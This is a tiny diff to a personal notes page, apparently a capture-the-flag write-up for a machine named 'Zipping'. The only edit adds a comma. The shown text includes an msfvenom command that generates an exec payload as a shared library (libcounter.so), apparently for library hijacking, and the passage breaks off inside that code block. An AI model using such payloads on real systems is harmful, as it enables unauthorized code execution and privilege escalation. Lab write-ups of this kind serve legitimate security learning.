Paliak/PaliaksNotes/docs/Zipping/index.md

 ## msfvenom

 Probably the easiest way is to use msfvenom.
-There are various payloads available but a simple exec will save us starting another listener or other handler.
+There are various payloads available, but a simple exec will save us starting another listener or other handler.

 ```bash
 $ msfvenom -p linux/x64/exec -f elf-so -o libcounter.so